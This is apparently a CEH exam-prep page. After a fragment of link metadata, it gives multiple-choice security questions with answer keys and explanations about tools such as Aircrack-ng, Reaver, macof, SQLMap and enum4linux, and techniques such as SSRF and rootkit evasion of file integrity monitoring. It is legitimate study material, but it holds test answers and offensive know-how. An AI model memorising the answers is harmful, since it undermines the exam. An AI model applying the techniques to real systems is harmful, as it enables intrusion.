HTTP/1.1…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-analyst-reviews-a-web-server-log-and-sees-the-following-r-vknfi"},{"@type":"ListItem","position":865,"name":"An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employe…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-attacker-uses-the-social-engineering-toolkit-set-to-clo-61cqb"},{"@type":"ListItem","position":866,"name":"During a security assessment, an analyst runs 'enum4linux -a 10.0.0.5' and obtains a list of users, shares, and OS infor…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-security-assessment-an-analyst-runs-enum4linux-a-a011m"},{"@type":"ListItem","position":867,"name":"A penetration tester wants to identify live hosts on a large IP range without generating excessive network traffic. Whic…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-wants-to-identify-live-hosts-on-a-large-0wfr5"},{"@type":"ListItem","position":868,"name":"A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effecti…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-company-wants-to-protect-its-network-from-mac-flooding-att-x8889"},{"@type":"ListItem","position":869,"name":"During a penetration test, an analyst runs the command 'snmpwalk -v2c -c public 192.168.1.10' and receives a large amoun…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-an-analyst-runs-the-command-snmp-9x7j3"},{"@type":"ListItem","position":870,"name":"During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replica…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-forensic-investigation-an-analyst-finds-a-suspicio-77ucm"},{"@type":"ListItem","position":871,"name":"A security analyst runs `nmap -sS -sV -A 192.168.1.100` and obtains open ports and service versions. However, the analys…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-runs-nmap-ss-sv-a-192-168-1-100-and-h7bc4"},{"@type":"ListItem","position":872,"name":"A security analyst is reviewing a vulnerability scan report for a web server that hosts an e-commerce application. The r…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-is-reviewing-a-vulnerability-scan-report--bi9jq"},{"@type":"ListItem","position":873,"name":"Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-are-characteristics-of-a-dns-ampl-g3pwo"},{"@type":"ListItem","position":874,"name":"Which type of malware is characterized by self-replication and spreading across networks without needing a host file?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-type-of-malware-is-characterized-by-self-replication-a-zei7n"},{"@type":"ListItem","position":875,"name":"An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-attacker-attempts-to-exploit-a-web-application-by-sending-ta4mf"},{"@type":"ListItem","position":876,"name":"During a reconnaissance phase, a penetration tester uses Shodan to search for devices with a specific open port. Which o…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-reconnaissance-phase-a-penetration-tester-uses-sho-ogu2g"},{"@type":"ListItem","position":877,"name":"Which TWO of the following tools are capable of cracking password hashes offline? (Select 2)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-two-of-the-following-tools-are-capable-of-cracking-pas-2cpz1"},{"@type":"ListItem","position":878,"name":"Which THREE of the following are common indicators of a buffer overflow vulnerability?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-common-indicators-of-a-buff-edllc"},{"@type":"ListItem","position":879,"name":"A network administrator notices a large number of SYN packets from various spoofed source IP addresses targeting a web s…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-network-administrator-notices-a-large-number-of-syn-packet-8kve5"},{"@type":"ListItem","position":880,"name":"Which THREE of the following are common techniques used during the footprinting phase? (Choose three.)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-common-techniques-used-duri-nug0d"},{"@type":"ListItem","position":881,"name":"Which of the following tools is specifically used to enumerate SMB shares and retrieve file listings from Windows system…","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-tools-is-specifically-used-to-enumera-pykwn"},{"@type":"ListItem","position":882,"name":"A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-team-suspects-a-session-hijacking-attack-the-ana-hjpyn"},{"@type":"ListItem","position":883,"name":"During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a passwo…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-social-engineering-assessment-an-attacker-calls-a-no5gi"},{"@type":"ListItem","position":884,"name":"Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection …","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-of-the-following-tools-is-specifically-designed-to-aut-xkfap"},{"@type":"ListItem","position":885,"name":"A penetration tester performs a container escape by exploiting a misconfigured capability and mounts the host filesystem…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-performs-a-container-escape-by-exploiti-001r4"},{"@type":"ListItem","position":886,"name":"Which THREE Nmap options are commonly used to evade firewall detection during a scan? (Choose three.)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-nmap-options-are-commonly-used-to-evade-firewall-2uxi4"},{"@type":"ListItem","position":887,"name":"Which password cracking method uses a precomputed table of hash chains to reverse password hashes quickly?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-password-cracking-method-uses-a-precomputed-table-of-h-kr7hw"},{"@type":"ListItem","position":888,"name":"An organization deploys a fleet of IoT cameras that communicate with a central server over the internet. The cameras use…","url":"https://courseiva.com/questions/ec-council/ec-ceh/an-organization-deploys-a-fleet-of-iot-cameras-that-communic-pebrp"},{"@type":"ListItem","position":889,"name":"A security analyst wants to perform passive reconnaissance on a target organization without generating any traffic to th…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-analyst-wants-to-perform-passive-reconnaissance-o-gximd"},{"@type":"ListItem","position":890,"name":"A penetration tester performs a container escape from a Docker container running in a cloud environment. Which of the fo…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-performs-a-container-escape-from-a-dock-645hr"},{"@type":"ListItem","position":891,"name":"During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. Y…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-you-identify-a-parameter-in-a-web-g8aef"},{"@type":"ListItem","position":892,"name":"Which THREE of the following are valid defenses against CSRF attacks? (Select 3)","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-valid-defenses-against-csrf-yqomn"},{"@type":"ListItem","position":893,"name":"During a penetration test, a tester gains access to a Linux system and needs to escalate privileges. The tester finds th…","url":"https://courseiva.com/questions/ec-council/ec-ceh/during-a-penetration-test-a-tester-gains-access-to-a-linux-k4nwz"},{"@type":"ListItem","position":894,"name":"A security engineer is configuring DDoS protection for a web server. The goal is to mitigate a Slowloris attack. Which m…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-security-engineer-is-configuring-ddos-protection-for-a-web-cbo25"},{"@type":"ListItem","position":895,"name":"Which phase of the system hacking methodology (CHPSET) involves hiding files from the operating system using techniques …","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-phase-of-the-system-hacking-methodology-chpset-invol-o32mx"},{"@type":"ListItem","position":896,"name":"Which asymmetric encryption algorithm is based on the algebraic structure of elliptic curves over finite fields and prov…","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-asymmetric-encryption-algorithm-is-based-on-the-algebr-zpl5b"},{"@type":"ListItem","position":897,"name":"A network switch starts behaving like a hub, broadcasting all traffic to all ports. The security team suspects an attack…","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-network-switch-starts-behaving-like-a-hub-broadcasting-al-5qvl5"},{"@type":"ListItem","position":898,"name":"Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-three-of-the-following-are-effective-mitigation-techni-z1amt"},{"@type":"ListItem","position":899,"name":"A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames …","url":"https://courseiva.com/questions/ec-council/ec-ceh/a-penetration-tester-discovers-that-a-web-application-s-logi-m4drw"},{"@type":"ListItem","position":900,"name":"Which tool is specifically designed to crack Windows LM and NTLM hashes using precomputed tables?","url":"https://courseiva.com/questions/ec-council/ec-ceh/which-tool-is-specifically-designed-to-crack-windows-lm-and-o8lyj"}]}
During a penetration test, you capture the following 4-way handshake using airodump-ng. Which tool would you use to attempt a dictionary attack to recover the WPA2 passphrase?
A.Reaver
B.Aircrack-ng
C.Kismet
D.John the Ripper
AnswerB
Aircrack-ng reads the captured 4-way handshake (the PMKID or EAPOL exchange) and tests each candidate passphrase from the wordlist by deriving the PBKDF2 key and verifying the MIC, directly satisfying the dictionary-attack requirement against WPA2.
Why this answer
Aircrack-ng is the standard tool for performing dictionary attacks against captured WPA2 handshakes. It takes the 4-way handshake (captured in a .cap file) and a wordlist, and attempts to derive the pre-shared key (PSK) by trying each passphrase, computing the PMK, and verifying the MIC. It is specifically designed for this purpose.
Exam trap
CEH often tests the confusion between tools for WPS attacks (Reaver) and WPA2 dictionary attacks (Aircrack-ng), and may include general password crackers like John the Ripper as distractors.
How to eliminate wrong answers
Option A is wrong because Reaver exploits WPS PIN vulnerabilities, not dictionary attacks on WPA2 handshakes. Option C is wrong because Kismet is a wireless network detector, sniffer, and IDS, but does not perform dictionary attacks. Option D is wrong because John the Ripper is a general-purpose password cracker that can be used for many hash types, but it does not natively support WPA/WPA2 handshake cracking without additional tools or conversion scripts; Aircrack-ng is the specialized tool.
Which TWO of the following are characteristics of a polymorphic virus? (Choose two.)
Select 2 answers
A.Remains constant in code to ensure replication
B.Mutates its code to evade signature detection
C.Uses encryption with a variable key
D.Spreads via network shares
E.Resides in the boot sector of a hard drive
AnswersB, C
Polymorphic viruses are specifically designed with a mutation engine that generates a different, functionally identical variant of the virus body with each replication. This constant alteration of their code signature, including instruction sequences and encryption routines, makes it extremely challenging for traditional signature-based antivirus software to identify and block them. The primary goal of this mutation is to bypass detection mechanisms that rely on fixed patterns.
Why this answer
A polymorphic virus mutates its code—typically by using a mutation engine—while preserving its original functionality. This mutation changes the virus's signature each time it replicates, allowing it to evade signature-based detection by antivirus software. Option C is correct because polymorphic viruses commonly use encryption with a variable key; the virus body is encrypted, and the decryption routine mutates, so the encrypted payload looks different with each infection.
Exam trap
The trap here is that candidates often confuse 'polymorphic' with 'metamorphic' or assume that all viruses that use encryption are polymorphic, but the key distinction is that polymorphic viruses use a variable key and mutate the decryption routine, whereas simple encrypted viruses use a fixed key and do not change their decryptor.
Which of the following tools is specifically designed to perform MAC flooding to force a switch into fail-open mode, allowing packet sniffing?
A.Ettercap
B.Wireshark
C.Nmap
D.macof
AnswerD
macof, a tool within the dsniff suite, is specifically engineered to execute MAC flooding attacks against network switches. It operates by rapidly generating and transmitting a massive number of Ethernet frames, each containing a unique, randomly generated source MAC address. This malicious activity aims to exhaust the switch's Content Addressable Memory (CAM) table, forcing the switch to enter a "fail-open" or "hub mode" state. In this state, the switch broadcasts all incoming traffic to every connected port, thereby allowing an attacker to passively sniff all network communications.
Why this answer
The macof tool (part of the dsniff suite) is specifically designed to perform MAC flooding attacks. It floods a switch with thousands of random MAC addresses, exhausting the Content Addressable Memory (CAM) table. When the CAM table is full, the switch enters fail-open mode and begins flooding all frames out all ports, effectively turning it into a hub and allowing an attacker to sniff traffic that was not originally destined for their port.
Exam trap
The trap here is that candidates often confuse MAC flooding with ARP poisoning, and mistakenly choose Ettercap (which is famous for ARP spoofing) instead of recognizing that macof is the dedicated tool for CAM table overflow attacks.
How to eliminate wrong answers
Option A is wrong because Ettercap is a comprehensive man-in-the-middle (MITM) attack toolkit that supports ARP poisoning, DNS spoofing, and other interception techniques, but it does not perform MAC flooding as its primary or designed function. Option B is wrong because Wireshark is a network protocol analyzer used for capturing and inspecting packets; it has no capability to generate traffic or perform MAC flooding. Option C is wrong because Nmap is a network scanning and reconnaissance tool used for port scanning, service detection, and OS fingerprinting; it is not designed to flood a switch's CAM table.
An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?
A.Using a list of compromised credentials from a data breach
B.Trying many passwords for a single account
C.Trying a few common passwords against many accounts
D.Using automated tools to bypass CAPTCHA
AnswerC
This is the precise definition of a password spraying attack. Attackers employ this technique by taking a small list of commonly used passwords (e.g., 'Password123', 'Summer2023!') and attempting each of these passwords against a large number of different user accounts within the same system. The primary goal is to avoid triggering account lockout thresholds, which are typically set per-account, by only attempting one or two passwords per user before moving on to the next account.
Why this answer
Password spraying uses a few common passwords against many accounts to avoid account lockout.
A security analyst is investigating a malware incident and needs to determine whether a suspicious file is malicious. The analyst has a hash of the file and wants to quickly check if it is a known malware sample without executing it. Which action should the analyst take?
A.Query the hash against an online malware hash repository such as MalwareBazaar or VirusTotal's hash search.
B.Perform static analysis by disassembling the file to look for malicious code patterns.
C.Upload the file to a public malware analysis service like VirusTotal and review the detection results.
D.Run the file in a sandbox and observe its behavior to determine if it is malicious.
AnswerA
Querying the hash against an online repository like MalwareBazaar or VirusTotal's hash search allows the analyst to check if the file is known malware without uploading the file itself. This preserves confidentiality and provides quick results. If the hash matches a known sample, the analyst can obtain additional information such as family, behavior, and indicators of compromise.
Why this answer
Querying the hash against an online malware hash repository is the fastest and safest way to check if a file is known malware. It avoids uploading the potentially sensitive file and provides immediate results from community-sourced threat intelligence. This method is ideal when the analyst only has a hash and needs a quick determination.
Exam trap
The trap here is thinking that uploading the file to a public service is always necessary, when in fact a hash lookup can often provide the answer without exposing the file.
During a web application assessment, a tester notices that a page reflects the value of a query parameter directly into the HTML response body without encoding, and the reflected value executes script in the browser when the crafted link is opened. Which of the following most accurately describes this vulnerability?
A.DOM-based cross-site scripting, because the payload is processed entirely within the client-side JavaScript.
B.Reflected cross-site scripting, because the injected script is returned in the immediate response to the crafted request.
C.Cross-site request forgery, because the crafted link causes the victim's browser to issue an unintended request.
D.Stored cross-site scripting, because the payload persists on the server and is served to other users.
AnswerB
Reflected XSS occurs when user input is included in the response to the same request without proper output encoding, causing the browser to execute it. The tester's observation that the parameter is echoed back and executes when the crafted link is opened is the defining characteristic of this type.
Why this answer
The defining feature is that unencoded user input is reflected in the immediate HTTP response and executes in the browser, which is reflected cross-site scripting. Stored XSS would require persistence, DOM-based XSS would originate in client-side JavaScript, and CSRF concerns forged state-changing requests rather than script execution.
Exam trap
The trap here is conflating any script execution in the browser with stored or DOM-based XSS, when the immediate server reflection of the parameter is what determines the reflected classification.
Which Google dork would a penetration tester use to find login pages that are indexed by Google?
A.filetype:xls username password
B.intitle:"index of"
C.inurl:login
D.site:example.com intext:password
AnswerC
The `inurl:login` dork instructs Google to return results where the string "login" appears anywhere within the URL path or filename. Web developers commonly incorporate terms like "login," "signin," or "authenticate" into the URL structure to designate their authentication pages. This makes `inurl:login` a highly precise and efficient method for directly identifying and locating the entry points for user authentication within various web applications.
Why this answer
The Google dork 'inurl:login' specifically searches for URLs containing the word 'login', which commonly appear in login page paths (e.g., /login.php, /login.aspx). This allows a penetration tester to quickly identify indexed login portals for further reconnaissance, such as testing for default credentials or brute-force attacks.
Exam trap
The trap here is that candidates often confuse 'inurl:login' with 'intitle:login' or 'intext:login', but 'inurl:' is the precise operator for finding login pages by their URL structure, while 'intitle:' and 'intext:' target page titles and body content, respectively, which are less reliable for this specific purpose.
How to eliminate wrong answers
Option A is wrong because 'filetype:xls username password' targets Excel files that may contain credentials, not login pages. Option B is wrong because 'intitle:"index of"' reveals directory listings (e.g., open Apache indexes), not login pages. Option D is wrong because 'site:example.com intext:password' searches for pages containing the word 'password' in their body text, which could be any page (e.g., password reset forms or help pages), not specifically login pages.
In a cloud environment, which of the following is an example of a Server-Side Request Forgery (SSRF) attack?
A.An attacker exploits a web application to send HTTP requests from the server to an internal metadata endpoint
B.An attacker intercepts traffic between a load balancer and backend servers
C.An attacker uses a SQL injection to extract database contents
D.An attacker uploads a malicious file to an S3 bucket that executes code on the server
AnswerA
This scenario perfectly illustrates Server-Side Request Forgery (SSRF). The attacker manipulates a vulnerable web application to force the server itself to initiate HTTP requests to an arbitrary internal or external destination. In a cloud environment, targeting the internal metadata service (e.g., http://169.254.169.254/latest/meta-data/) is a common and critical SSRF exploitation technique, allowing the retrieval of sensitive information like IAM role credentials. This effectively turns the compromised server into a proxy for internal network reconnaissance and privilege escalation.
Why this answer
SSRF occurs when an attacker tricks the server into making requests to internal resources, such as a cloud metadata service, to obtain credentials.
Which TWO of the following are examples of hybrid password attacks? (Select 2 correct answers)
Select 2 answers
A.Using a wordlist to try every possible password in the list
B.Using a dictionary file and appending random numbers to each word
C.Using a set of rules with Hashcat to modify dictionary words (e.g., leet speak substitutions)
D.Generating all possible character combinations up to a certain length
E.Cracking passwords using precomputed rainbow tables
AnswersB, C
This is a classic example of a hybrid password attack, combining elements of a dictionary attack with a targeted brute-force component. By taking words from a dictionary file and systematically appending numerical sequences (e.g., 'password123', 'summer2024'), the attack efficiently targets common user password patterns that involve adding digits to memorable words. This method significantly expands the attack surface beyond a simple dictionary without resorting to a full, computationally expensive brute-force approach.
Why this answer
A hybrid password attack combines a dictionary or wordlist with additional modifications, such as appending random numbers to each word. This approach leverages common password patterns where users often add digits to a base word to meet complexity requirements, making it more effective than a simple dictionary attack.
Exam trap
EC-Council often tests the distinction between hybrid attacks and other attack types, and the trap here is that candidates may confuse a dictionary attack (Option A) with a hybrid attack, or mistake brute-force (Option D) or rainbow tables (Option E) as hybrid methods, when in fact hybrid attacks specifically combine a dictionary with rule-based modifications or appendages.
During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?
Select 3 answers
A.It functions as a remote access Trojan (RAT)
B.It is classified as a Trojan horse
C.It is a polymorphic virus that changes its signature each time it runs
D.It is a worm that replicates across the network automatically
E.It is capable of exfiltrating data to a remote server
AnswersA, B, E
A Remote Access Trojan (RAT) like 'svch' establishes a covert communication channel, often a backdoor, allowing an attacker to remotely control the compromised system. It facilitates unauthorized access to files, execution of commands, and monitoring of user activity, effectively turning the victim's machine into a remote puppet. This capability to open a backdoor and send information is a hallmark of RAT functionality, enabling persistent and stealthy control.
Why this answer
Option A is correct because a program that covertly opens a backdoor on port 4444 and accepts remote commands is functioning as a remote access Trojan (RAT), giving an attacker interactive control of the host. Option B is correct because the file masquerades as a legitimate executable (svch0st.exe mimicking svchost.exe), was downloaded from an untrusted source, and hides malicious functionality, which is the defining behavior of a Trojan horse. Option E is correct because the malware sends system information to a remote server, which is data exfiltration over the network to an attacker-controlled endpoint.
Option C is not correct because nothing in the scenario indicates self-mutating code or signature changes on each execution, which would be required for a polymorphic virus. Option D is not correct because there is no evidence of self-replication or automatic propagation across the network, which is the defining trait of a worm.
Exam trap
The trap here is that candidates may confuse a RAT with a worm or virus, but the key differentiator is that a RAT provides remote access without self-replication, while worms spread automatically and viruses require a host file to replicate.
A security analyst is reviewing logs from a recent social engineering engagement. The attacker used a phishing email that appeared to come from the company's CEO, requesting that the recipient update their payroll direct deposit information via a link. The link led to a credential harvesting page. Which type of social engineering attack is this?
A.Business email compromise (BEC)
B.Whaling
C.Vishing
D.Phishing
AnswerA
Business email compromise (BEC) is a sophisticated scam where an attacker impersonates a high-level executive to trick employees into transferring funds or revealing sensitive information. In this case, the attacker spoofed the CEO's email to request payroll direct deposit changes. BEC often targets employees in finance, HR, or payroll who have the authority to act on such requests. The use of a credential harvesting link is a common BEC tactic to steal login credentials.
Why this answer
Business email compromise (BEC) is a specific type of phishing that involves impersonating a senior executive to manipulate employees into performing financial transactions or disclosing sensitive data. The scenario describes an email spoofing the CEO and requesting a payroll change, which is a classic BEC attack. While it is a form of phishing, the impersonation of an executive and the financial nature of the request distinguish it as BEC.
Other options like whaling or vishing do not fit the described attack vector.
Exam trap
The trap here is selecting the broad category of phishing instead of the more specific business email compromise, which is defined by executive impersonation and financial fraud requests.
Which TWO of the following tools are used for cloud security auditing or exploitation?
Select 2 answers
A.ScoutSuite
B.John the Ripper
C.Pacu
D.Nessus
E.Aircrack-ng
AnswersA, C
ScoutSuite is a multi-cloud auditing tool that queries provider APIs to enumerate configuration weaknesses across AWS, Azure, GCP and others. It satisfies the stem's auditing criterion by producing a security posture report without exploiting the environment.
Why this answer
ScoutSuite (A) is a multi-cloud security auditing tool that queries cloud provider APIs (AWS, Azure, GCP, etc.) to enumerate resources and flag misconfigurations, making it a cloud security auditing tool. Pacu (C) is an open-source AWS exploitation framework designed for offensive security testing of cloud environments, providing modules for enumeration, privilege escalation, and persistence, so it fits cloud exploitation. John the Ripper (B) is an offline password cracker, Nessus (D) is a general-purpose vulnerability scanner for hosts and networks, and Aircrack-ng (E) is a Wi-Fi (802.11) wireless security auditing suite — none of these are specifically cloud security auditing or exploitation tools.
A penetration tester discovers that a target Windows system has port 445 open and responds to SMB requests. Which tool should the tester use to enumerate users, shares, and OS information from this system?
A.Nikto
B.Hydra
C.Nmap
D.enum4linux
AnswerD
enum4linux is a dedicated command-line tool specifically designed for enumerating information from Windows and Samba hosts using NetBIOS and SMB protocols. It effectively leverages null sessions and other SMB/RPC queries to extract a wealth of data, including user lists, group memberships, share names, OS version, service pack level, and even password policies. This makes it an ideal choice for detailed reconnaissance against Windows systems to uncover potential vulnerabilities and gather intelligence.
Why this answer
enum4linux is a tool specifically designed to enumerate information from Windows and Samba systems via SMB. It leverages the SMB protocol to extract users, shares, OS details, and other system information from a target with port 445 open, making it the correct choice for this scenario.
Exam trap
The trap here is that candidates may choose Nmap because it is a versatile tool that can perform SMB enumeration with scripts, but the CEH exam expects the specialized tool (enum4linux) for this specific task, as Nmap is primarily a port scanner and not the dedicated enumeration tool.
How to eliminate wrong answers
Option A is wrong because Nikto is a web server scanner that tests for vulnerabilities in HTTP/HTTPS services, not for SMB enumeration. Option B is wrong because Hydra is a password brute-forcing tool used for online attacks against various services, not for passive enumeration of users, shares, or OS information. Option C is wrong because while Nmap can detect open ports and perform basic SMB enumeration via scripts (e.g., smb-enum-shares), it is not the dedicated tool for comprehensive SMB enumeration; enum4linux is purpose-built for this task.
Which SNMP community string is typically used for read-only access by default on many devices?
A.snmp
B.private
C.admin
D.public
AnswerD
The "public" community string is the universally recognized and default read-only community string for SNMPv1 and SNMPv2c agents. This string allows an SNMP manager to query and retrieve various operational statistics and configuration details from a network device's Management Information Base (MIB) without the ability to alter any settings. Due to its widespread default configuration, "public" is frequently targeted by attackers seeking to gather network intelligence.
Why this answer
The default read-only community string in SNMPv1 and SNMPv2c is 'public'. This string acts as a password that allows an SNMP manager to query device MIB objects for monitoring purposes without making configuration changes. It is widely documented in RFC 1157 and is the standard default across most networking equipment.
Exam trap
The trap here is that candidates often confuse 'public' with 'private', mistakenly thinking 'private' is the read-only string, when in fact 'private' is the default read-write community string.
How to eliminate wrong answers
Option A is wrong because 'snmp' is not a standard default community string; it is occasionally used as a custom string but never as a default. Option B is wrong because 'private' is the default read-write community string, granting write access to modify device configurations, not read-only. Option C is wrong because 'admin' is a common administrative username, not an SNMP community string; SNMP community strings are separate from device login credentials.
Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?
A.SQLMap
B.Nmap
C.Burp Suite
D.John the Ripper
AnswerA
SQLMap automates SQL injection exploitation and database fingerprinting, satisfying the stem's requirement for both capabilities in one tool. It detects injection points, identifies the backend database management system, and extracts data through techniques such as boolean-blind, time-blind, error-based and union-based injection, removing the need for manual payload crafting during penetration tests.
Why this answer
SQLMap is an open-source penetration testing tool specifically designed to automate the detection and exploitation of SQL injection flaws and database server fingerprinting. It supports a wide range of database management systems (MySQL, Oracle, PostgreSQL, Microsoft SQL Server, etc.) and can automate tasks such as retrieving data, accessing the file system, and executing commands. Its core purpose aligns exactly with automated SQL injection exploitation and database fingerprinting.
Exam trap
CEH often tests the confusion between general-purpose web proxies/scanners (like Burp Suite) and specialized exploitation tools (like SQLMap), so candidates must remember that SQLMap is the dedicated tool for automated SQL injection and database fingerprinting.
How to eliminate wrong answers
Option B is wrong because Nmap is a network discovery and port scanning tool used for host discovery, service version detection, and OS fingerprinting, not for SQL injection or database-specific exploitation. Option C is wrong because Burp Suite is an integrated web application security testing platform that includes a proxy, scanner, and intruder, but it does not specialize in automated SQL injection exploitation or database fingerprinting; while it can detect some SQLi, it lacks the deep exploitation and database enumeration capabilities of SQLMap. Option D is wrong because John the Ripper is a password cracking tool that uses dictionary, brute-force, and rule-based attacks against password hashes, and has no functionality for SQL injection or database fingerprinting.
A penetration tester uses the tool Reaver to target a Wi-Fi network. What vulnerability is the tester attempting to exploit?
A.WPA2 4-way handshake capture
B.WPS PIN brute-force weakness
C.Weak WEP encryption keys
D.RADIUS authentication bypass
AnswerB
Reaver is specifically designed to exploit the design flaw in Wi-Fi Protected Setup (WPS) by performing a brute-force attack against the WPS PIN. This 8-digit PIN, often split into two smaller, independently verifiable sections, significantly reduces the number of attempts required to guess it. Successful exploitation allows Reaver to recover the WPA/WPA2 Pre-Shared Key (PSK), granting unauthorized access to the network.
Why this answer
Reaver is a tool specifically designed to exploit the WPS (Wi-Fi Protected Setup) PIN brute-force vulnerability. It targets the WPS registrar's lack of rate-limiting and the fact that the PIN is split into two halves (first half 4 digits, second half 3 digits with a checksum), allowing an attacker to recover the WPS PIN and subsequently the WPA2 pre-shared key in a matter of hours.
Exam trap
EC-Council often tests the distinction between WPS PIN brute-force (Reaver) and WPA2 handshake capture (aircrack-ng), so candidates mistakenly associate any wireless attack with handshake capture rather than recognizing the specific tool-to-vulnerability mapping.
How to eliminate wrong answers
Option A is wrong because capturing a WPA2 4-way handshake is performed with tools like airodump-ng or Wireshark, not Reaver; Reaver does not capture handshakes but instead brute-forces the WPS PIN. Option C is wrong because weak WEP encryption keys are exploited using tools like aircrack-ng or WEP cracking techniques (e.g., ARP replay attacks), not Reaver, which is designed for WPS attacks on WPA/WPA2 networks. Option D is wrong because RADIUS authentication bypass typically targets enterprise 802.1X networks using tools like asleap or hostapd-wpe, not Reaver, which operates on the WPS protocol used in personal (PSK) mode.
An IoT device uses MQTT for communication. An attacker intercepts MQTT packets and observes that the publish messages are not encrypted and contain plaintext sensor data. Which of the following is the BEST recommendation to secure MQTT traffic?
A.Base64-encode the payload
B.Switch to CoAP protocol
C.Use MQTT over TLS
D.Implement a VPN on the device
AnswerC
Using MQTT over TLS (Transport Layer Security), often referred to as MQTTS, is the standard and most effective method to secure MQTT communications against eavesdropping. TLS establishes an encrypted tunnel between the MQTT client and broker, ensuring that all data exchanged is confidential and cannot be read by unauthorized parties. Furthermore, TLS provides data integrity verification, preventing tampering, and offers server authentication through certificates, confirming the identity of the broker to the client.
Why this answer
MQTT itself does not provide encryption; using TLS (MQTT over TLS) encrypts the entire communication channel, protecting data in transit.
After gaining initial access to a Linux server, a penetration tester wants to maintain persistence by creating a backdoor. The tester decides to replace a common system binary with a trojanized version. Which of the following techniques is MOST likely to evade detection by file integrity monitoring (FIM) systems?
A.Replace the binary with a modified version that has the same file size and timestamp
B.Place the backdoor in a directory that is excluded from FIM monitoring
C.Use steganography to hide the backdoor inside an image file
D.Use a kernel-level rootkit that intercepts read operations to present the original binary's content
AnswerD
A kernel-level rootkit operates within the operating system's kernel, granting it the highest level of privilege and control. By hooking system calls, specifically `read()` operations, the rootkit can intercept requests from the FIM agent to read the compromised binary. Instead of returning the modified, malicious content, the rootkit presents the *original*, untampered content of the binary to the FIM system. This sophisticated deception ensures that the FIM system calculates the expected hash, thus reporting no integrity violation, while the malicious binary continues to execute its payload.
Why this answer
A kernel-level rootkit can intercept system calls (e.g., open, read) used by FIM tools to verify file integrity. When the FIM queries the trojanized binary, the rootkit returns the original, unmodified content, so the hash or checksum matches the baseline. This subverts detection at the kernel layer, bypassing user-space integrity checks entirely.
Exam trap
The trap here is that candidates often choose Option A, mistakenly believing that matching file size and timestamp is sufficient to evade FIM, but FIM relies on cryptographic hashes, not metadata, to detect changes.
How to eliminate wrong answers
Option A is wrong because simply matching file size and timestamp does not prevent FIM from detecting a changed cryptographic hash (e.g., SHA-256) of the binary; FIM tools compute hashes, not just metadata. Option B is wrong because placing the backdoor in an excluded directory is not a stealthy evasion technique—it relies on misconfiguration and would be obvious during a thorough audit or if the FIM policy is reviewed. Option C is wrong because steganography hides data within an image file, but replacing a system binary with an image would break system functionality and be immediately detected by FIM as a missing or altered binary.
Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)
Select 2 answers
A.HTTP flood
B.Smurf attack
C.SYN flood
D.UDP flood
E.Slowloris
AnswersA, E
An HTTP flood is a Layer 7 (Application Layer) Distributed Denial of Service (DDoS) attack that overwhelms a web server by sending a massive volume of legitimate-looking HTTP GET or POST requests. These requests consume the server's CPU, memory, and bandwidth resources, making it unable to respond to legitimate user traffic. Unlike lower-layer attacks, it targets the specific application protocol, mimicking normal user behavior to evade simple network-level defenses.
Why this answer
HTTP flood is a Layer 7 DDoS attack because it targets the application layer by sending seemingly legitimate HTTP GET or POST requests to overwhelm a web server's resources. Unlike network-layer attacks, HTTP flood exploits the server's ability to process requests, often mimicking normal user behavior to bypass basic rate limiting. Slowloris is also a Layer 7 attack that works by opening multiple HTTP connections and keeping them open with partial requests, exhausting the server's connection pool without completing the handshake.
Exam trap
The trap here is that candidates often confuse SYN flood (Layer 4) with application-layer attacks because both involve flooding, but SYN flood targets the TCP handshake at the transport layer, not the HTTP protocol at Layer 7.
In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?
A.Repeater
B.Proxy
C.Scanner
D.Intruder
AnswerA
